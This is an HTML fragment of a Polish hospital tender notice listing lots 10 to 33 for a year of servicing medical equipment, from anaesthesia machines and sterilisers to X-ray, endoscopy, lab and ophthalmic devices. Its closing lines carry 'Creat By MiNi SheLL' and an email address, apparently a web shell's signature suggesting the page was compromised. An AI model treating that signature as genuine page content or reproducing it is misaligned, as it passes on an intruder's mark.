<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Aparat do znieczulania	Anastar N-7	2	2
2.	Aparat do znieczulania	Sulla	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 Aparaty do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Aparat do znieczulania 	Fabius	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 Lancentrony, Diatermie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1	Lancentron	GT 50	1	1
2.	Aparat elektrochirurgiczny	Eltron 120	1	1
3.	Aparat elektrochirurgiczny	ES 350/2	3	1
4.	Aparat diatermi krótkofalowej 	BTL 20	1	1
5.	Aparat elektrochirurgiczny	ES 350	2	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12 Sterylizatory, autoklawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Sterylizator	SP 65 G	2	1
2.	Sterylizator	SP 32 E	1	1
3.	Sterylizator	SP 125 G	1	1
4.	Sterylizator parowy	PS 400	1	1
5.	Sterylizator pionowy 	ASV	1	1
6.	Sterylizator	STERIVAP 669	1	1
7.	Sterylizator  pionowy	ASV E	1	1
8.	Sterylizator	Unisterii  336	1	1
9.	Sterylizator pionowy Systec	V 75	1	1
10.	Autoklaw  kasetowy 	Statim 5000 S	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 Aparatura radiologiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Aparat RTG	Clisis + Argostat	1	1
2.	Aparat RTG przyłóżkowy	TX 4 Plus	2	1
3.	Aparat RTG ramię C	Philips BV 25	1	1
4.	Aparat RTG ramię C	Eposkop 800	1	1
5.	Aparat RTG  	System Opera	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 Aparatura ultrasonograficzna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Ultrasonograf	SONIC/OP	1	1
2.	Ultrasonograf	MYLAB	1	1
3.	Ultrasonograf	IN-VISOR	1	1
4.	Ultrasonograf	Ultramark	1	1
5.	Ultrasonograf	MEGAS  ESAOTE	1	1
6.	Ultrasonograf	SL-1	1	1
7.	Ultrasonograf	SPINEL	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 Aparatura endoskopowa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Gastroskop wideo	Fujinon	2	1
2.	Wideokolonoskop	Fujinon	2	1
3.	Zestaw wideo do badań endoskopowych	Fujinon	2	1
4.	Bronchoskop	FB 12T	1	1
5.	Myjka endoskopowa Washer CYW 100 N	Fujinon	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 Aparatura endoskopowa II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Duodenoskop	TJF 20	1	1
2.	Laryngofiberoskop	FB-PE 2	1	1
3.	Gastroskop	GIF-E	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 Zestaw  Histeroskopowy, Laparoskopowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1	Zestaw Laparoskopowy	   SZTORC                                                                                        	1	1
2	Zestaw Histeroskopowy                                      Artropompa 28330020                                                     Hamou  Endomat                                    -  Powershawer  SL 20721020                             - osprzęt                                    	   SZTORC                                                                                        	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 Urządzenia do fizykoterapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Mixing	2 3M	2	1
2.	Magnoter Magnetronic	D 26	2	1
3.	Madyn 	D 21	2	1
4.	Ultraton	D 200	2	1
5.	Stymet	S 200	2	1
6.	Stymet	S 210	1	1
7.	Interdyn	D 79	1	1
8.	Urządzenie do laseroterapii	LAC 50	1	1
9.	Urządzenie do laseroterapii	LAC 71	1	1
10.	Urządzenie do laseroterapii	LAC 102	1	1
11.	Laser bistumilacyjny	30 DCC	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 Urządzenia do mycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Myjnia dezynfektor	4656 Getinge	1	1
2.	Myjnia dezynfektor do narzędzi	G 7836 CD  MIELLE	1	1
3.	Myjnia dezynfektor 	Mielle Picollo 500	2	1
4.	Myjnia dezynfektor	Euromat	3	1
5.	Myjnia ultradzwiękowa	Sonic	1	1
6.	Łaznia wodna	analogo.	6	1
7.	Myjnja dezynfektor	Deco 190	4	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 Urządzenia laboratoryjne-różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Wytrząsarka	Vortex VX 1	1	1
2.	Wytrząsarka	WU 4	1	1
3.	Mieszadło hematologiczne	UMH-  5	2	1
4.	Desilametr	Lachema	1	1
5.	Labulader		1	1
6.	Koagulator 	3003	1	1
7.	Sumator	Hem.  Kortex	3	1
8.	Mikroskop 	Biolar	4	1
9.	Mikroskop 	PZO	1	1
10.	Mikroskop 	Jenamed	2	1
11.	Cieplarka elektryczna		9	1
12.	Cieplarka elektryczna	CL 65	3	1
13.	Wirówka 	T 24 D	4	1
14.	Wirówka 	S 70	1	1
15.	Wirówka 	MPW 223	2	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 Aparat do hemodializy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1	Aparat do terapii nerkozastępczej	Gambro	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 Sprzęt medyczny - pozostały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Analizator glukozy	Hemocue  Glucise	1	1
2.	Oxiguant	MC	4	1
3.	Echowiblator		1	1
4.	System ogrzewania pacjenta	Warm Touch	3	1
5.	Podgrzewacz płynów infuzyjnych	ANIMEC AM	2	1
6.	Detektor  tętna płodu	Sonicard	5	1
7.	Detektor  tętna płodu	300 Brael	1	1
8.	Detektor  tętna płodu	20  Brael	1	1
9.	Piła do gipsu	Eskulap GA 704	1	1
10.	Piła do gipsu	Eskulap G 6100-05	1	1
11.	Kapnograf	Nowa Metrix	1	1
12.	Kardiostymulator  	MIP -801	1	1
13.	Wiertarka chirurgiczna	G 3004	2	1
14.	Rektoskop 	Precoptic	1	1
15.	Rektoskop 	uniwersal.	1	1
16.	Aparat do elektroterapii		1	1
17.	Amnioskop	BOB OM	1	1
18.	Fisiotek	2000 E	1	1
19.	Kolposkop	KLP 22	1	1
20.	Zasilacz opasek zaciskowych		1	1
21.	Videokolposkop		1	1
22.	Dermatoskop		1	1
23.	Pionizator 	Sito	1	1
24.	Aparat do kriochirurgii	CRYO-S	1	1
25.	Zgrzewarka rolkowa	Steriking RS 120	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 Aparatura Echokardiograficzna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Echokardiograf 	VIVID 5	1	1
2.	Echokardiograf 	VIVID 3	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 Urządzenia do podawania kontrastu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1	Strzykawka automatyczna	Viston	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 Aparat do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1	Aparat do znieczulania 	Penlon	3	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26 Aparatura laboratoryjna I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Analizator parametrów krytycznych    	ABL 835 F	1	1
2.	Analizator parametrów krytycznych 	NPT 7	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 Napęd traumatologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Napęd traumatologiczny + osprzęt	3Ti/G672	2	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28 Aparatura Laboratoryjna II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1	Analizator hematologiczny Sysmex	KX 21	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie nr 29 Aparatura Laboratoryjna III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Analizator biochemiczny 	Konelab	1	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie nr 30 Aparatura okulistyczna I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Autorefraktometr z keratometrem	GR-3100 K	1	1
2.	Rzutnik panel optotyów	Cp 200	1	1
3.	Unit okulistyczny z blatem	Tulipan 840	1	1
4.	Lampa strzelinowa	Rrane YZ5F	1	1
5.	Oftalmoskop 	Coaxial	1	1
6.	Tonometr aplanacyjny 	L 5110	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie nr 31 Aparatura okulistyczna II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Tomograf optyczny OCT i-vue 100 FD	100  FD	1	1
2.	Perymetr komputerowy	HFA 740	1	1
3.	Ultrasonograf  okulistyczny	Aviso	1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zadanie nr 32 Urządzenie do badania słuchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	urządzenie do screningowego badania słuchu OTO READ 		1	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Zadanie nr 33 Wagi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Nazwa urządzenia	Typ/ model	Ilość urządzeń	Przewidywana ilość przeglądów na okres trwania umowy
1.	2.	3.	4.	5.
1.	Waga Niemowlęca 		12	1
2.	Waga osobowa ze wzrostomierzem		14	1
3.	Waga elektroniczna	AXIS,  Nadwag	4	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com